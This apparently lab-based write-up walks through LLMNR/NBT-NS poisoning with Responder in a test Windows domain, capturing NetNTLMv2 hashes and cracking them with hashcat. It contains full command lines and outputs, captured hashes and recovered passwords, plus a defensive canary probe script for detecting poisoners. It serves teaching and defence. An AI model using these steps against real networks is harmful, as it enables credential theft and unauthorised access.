# Grab a hash using the responder.py tool
In this post we look at how LLMNR poisoning can be used to capture the NetNTLMv2 hash of a specific user and crack it in order to gain access.

We have a domain called master.loc, where the domain controller is dc1. The client workstation is client1.

LLMNR is a link-local name resolution protocol that Windows hosts fall back to when DNS cannot resolve a name. In our scenario we will try to access a file server called wow.master.loc that DNS cannot resolve, in order to trigger an LLMNR lookup and eventually grab that user's hash. Responder poisons LLMNR, NBT-NS and mDNS alike; in the run below the answer the client accepted was in fact an NBT-NS one. What gets captured is the NetNTLMv2 challenge-response (hashcat mode 5600), not the account's NT hash, so it has to be cracked offline. Then we will proceed to cracking the hash.
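From the defender's side, the same mechanism that lets Responder answer for wow.master.loc also gives it away: a name that no host owns should never receive an LLMNR answer. The following canary probe is an added example written for this page (it is not part of Responder or hashcat). It sends one LLMNR query for a random, constructed name to the link-local multicast group and reports any host that answers; the `build_llmnr_query` and `parse_llmnr_response` helpers implement the RFC 4795 wire format (DNS message layout on UDP 5355) and can be exercised offline, while `probe` needs a host on the same segment as the suspected poisoner. The sample address in the comments is constructed for illustration.

```python
"""Canary LLMNR probe: detect an LLMNR poisoner on the local segment.

Added example for this page; not part of Responder or hashcat.
A random canary name is owned by nobody, so any LLMNR answer for it
comes from a host answering for names it cannot own, which is what a
poisoner does. LLMNR (RFC 4795) reuses the DNS message format on UDP
port 5355, multicast group 224.0.0.252.
"""
import secrets
import socket
import struct

LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    """Encode a hostname as DNS labels: <len><label> ... <0>."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("bad label length")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Standard LLMNR query: header (flags 0, QDCOUNT 1) + one A question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def _skip_name(data: bytes, off: int) -> int:
    """Return the offset just past a (possibly compressed) name at `off`."""
    while True:
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:  # compression pointer, 2 bytes in total
            return off + 2
        off += 1 + length


def parse_llmnr_response(data: bytes, txid: int) -> list:
    """IPv4 addresses in the answer section of an LLMNR response whose
    transaction id matches `txid`; [] for anything else or malformed data."""
    try:
        if len(data) < 12:
            return []
        rid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
        if rid != txid or not flags & 0x8000:  # QR bit must be set
            return []
        off = 12
        for _ in range(qd):  # skip the echoed question(s)
            off = _skip_name(data, off) + 4
        addrs = []
        for _ in range(an):
            off = _skip_name(data, off)
            rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
            off += 10
            if rtype == QTYPE_A and rclass == QCLASS_IN and rdlen == 4:
                addrs.append(socket.inet_ntoa(data[off:off + 4]))  # e.g. "10.10.10.200" (constructed)
            off += rdlen
        return addrs
    except (IndexError, struct.error):
        return []


def canary_name() -> str:
    """A constructed, random single-label name that no legitimate host owns."""
    return "canary-" + secrets.token_hex(4)


def probe(timeout: float = 2.0) -> list:
    """Send one canary query to the LLMNR group and return a list of
    (responder_ip, answered_addresses) for every reply received.
    Any non-empty result means some host answers for names it cannot own."""
    txid = secrets.randbelow(0x10000)
    query = build_llmnr_query(canary_name(), txid)
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        # Link-local scope group; TTL 255 satisfies responders that enforce
        # the RFC 4795 hop-limit check, and the group is never forwarded.
        s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
        s.settimeout(timeout)
        s.sendto(query, (LLMNR_GROUP, LLMNR_PORT))
        while True:
            try:
                data, (src, _port) = s.recvfrom(4096)
            except socket.timeout:
                break
            answered = parse_llmnr_response(data, txid)
            if answered:
                hits.append((src, answered))
    return hits


if __name__ == "__main__":
    for src, answered in probe():
        print(f"ALERT: {src} answered the canary LLMNR query with {answered}")
```

Run it from a sensor host on each client VLAN on a schedule. A poisoner configured like the one above, which replies to every name except those listed under "Don't Respond To Names", will answer the canary with its own address, which is the indicator to alert on; the probe sends nothing but a harmless name query, so it is safe to run continuously. The parser handles both literal and compressed (pointer) names in the answer section, since implementations differ in which form they emit.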
```
──╼ $sudo responder -I enp0s8 --lm --disable-ess
[sudo] password for saitama:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [ON]
Force ESS downgrade [ON]
[+] Generic Options:
Responder NIC [enp0s8]
Responder IP [10.10.10.200]
Responder IPv6 [fe80::786e:5609:a419:fbc2]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-JDPERRKYLH5]
Responder Domain Name [R632.LOCAL]
Responder DCE-RPC Port [49484]
[+] Listening for events...
[*] [NBT-NS] Poisoned answer sent to 10.10.10.150 for name WOW.MASTER.LOC (service: File Server)
[SMB] NTLMv2 Client : 10.10.10.150
[SMB] NTLMv2 Username : notmaster\duser1
[SMB] NTLMv2 Hash : duser1::notmaster:33dc78a2456c40ec:D272469A091520ED30CAD7A3E76D4A81:0101000000000000653DB9E08D34DA01A085F7FC65CAC43F00000000020000000000000000000000
[*] Skipping previously captured hash for notmaster\duser1
[+] Exiting...
```
## Crack that hash
```
┌─[✗]─[saitama@parrot]─[~/Desktop/alldumps/20231222_ntlm_crack]
└──╼ $hashcat -m 5600 ./hash1.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-AMD Ryzen 7 PRO 7840U w/ Radeon 780M Graphics, 2864/5793 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 2 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: DUSER1::notmaster:63ab4f52bfe5c023:96a45f46313d1897...000000
Time.Started.....: Fri Dec 22 09:18:44 2023 (6 secs)
Time.Estimated...: Fri Dec 22 09:18:50 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2571.4 kH/s (0.92ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 41%
Started: Fri Dec 22 09:18:18 2023
Stopped: Fri Dec 22 09:18:52 2023
┌─[✗]─[saitama@parrot]─[~/Desktop/alldumps/20231222_ntlm_crack]
└──╼ $
┌─[✗]─[saitama@parrot]─[~/Desktop/alldumps/20231222_ntlm_crack]
└──╼ $nano passwords.txt
┌─[saitama@parrot]─[~/Desktop/alldumps/20231222_ntlm_crack]
└──╼ $hashcat -m 5600 ./hash1.txt ./passwords.txt
hashcat (v6.2.6) starting
...
[SNIP]
...
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
DUSER1::notmaster:63ab4f52bfe5c023:96a45f46313d18979b7d7991e5d7500f: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:dfgh@1234
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: DUSER1::notmaster:63ab4f52bfe5c023:96a45f46313d1897...000000
Time.Started.....: Fri Dec 22 09:21:17 2023 (0 secs)
Time.Estimated...: Fri Dec 22 09:21:17 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (./passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12766 H/s (0.02ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4/4 (100.00%)
Rejected.........: 0/4 (0.00%)
Restore.Point....: 0/4 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: abcd@1234 -> dfgh@1234
Hardware.Mon.#1..: Util: 12%
Started: Fri Dec 22 09:21:16 2023
Stopped: Fri Dec 22 09:21:19 2023
```
## Interesting 1
The following hash was captured during the intercept:
```
[SMB] NTLMv2-SSP Client : fe80::19f1:b84c:143e:f139
[SMB] NTLMv2-SSP Username : NOTMASTER\duser3
[SMB] NTLMv2-SSP Hash : duser3::NOTMASTER:e32b3308707ba8c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
```
Note that this user does not exist in the domain; we still try to crack the hash to confirm what the client sent.
```
┌─[✗]─[user@parrot]─[/tmp]
└──╼ $hashcat -m 5600 ./hash.txt ./password.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-skylake-avx512-AMD Ryzen 9 7900X 12-Core Processor, 2912/5889 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 2 MB
Dictionary cache built:
* Filename..: ./password.txt
* Passwords.: 5
* Bytes.....: 53
* Keyspace..: 5
* Runtime...: 0 secs
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
DUSER3::NOTMASTER:e32b3308707ba8c7:670b2d866b67133871d533380a918af2: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:duser@1234
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: DUSER3::NOTMASTER:e32b3308707ba8c7:670b2d866b671338...000000
Time.Started.....: Wed Jan 24 20:50:14 2024 (0 secs)
Time.Estimated...: Wed Jan 24 20:50:14 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (./password.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 139 H/s (0.01ms) @ Accel:512 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5/5 (100.00%)
Rejected.........: 0/5 (0.00%)
Restore.Point....: 0/5 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: abcd@1234 -> duser@3456
Started: Wed Jan 24 20:49:59 2024
Stopped: Wed Jan 24 20:50:15 2024
┌─[user@parrot]─[/tmp]
└──╼ $cat ./password.txt
abcd@1234
efgh@1234
duser@1234
duser@2345
duser@3456
```